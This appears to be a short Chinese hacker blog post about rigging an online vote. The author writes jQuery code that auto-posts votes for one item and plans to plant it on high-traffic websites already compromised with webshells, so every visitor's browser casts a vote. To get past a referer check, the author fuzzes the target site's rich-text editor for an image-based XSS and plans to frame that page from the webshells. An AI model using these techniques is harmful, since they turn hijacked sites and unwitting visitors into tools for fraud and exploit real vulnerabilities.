团队成员发来一个投票的地址,需要撸某某网站的一个某某投票,果断看了下,ip限制了,看到post 数据包
  

webshell + xss 猥琐刷某投票

   额 随便找个大流量shell post 数据
Js代码
<script type="text/javascript" src=""></script> 

2 <script type="text/javascript"> 

3  $(document).ready(function(e) { 

4   var timestamp = (new Date()).valueOf(); 

5   $.post("?t="+timestamp ,{itemId:10072}); 

6 }); 

观察下 firebug post 木有成功

webshell + xss 猥琐刷某投票

估计判断来路了,得从本站提交才行,看来得找本站的xss配合,果断撸起,看到有博客有富文本,一番fuzz之后,找到个图片型xss

webshell + xss 猥琐刷某投票

找个大流量的webshell Iframe这个页面,不过天色已晚,那就先发条邪恶的围脖

webshell + xss 猥琐刷某投票



webshell + xss 猥琐刷某投票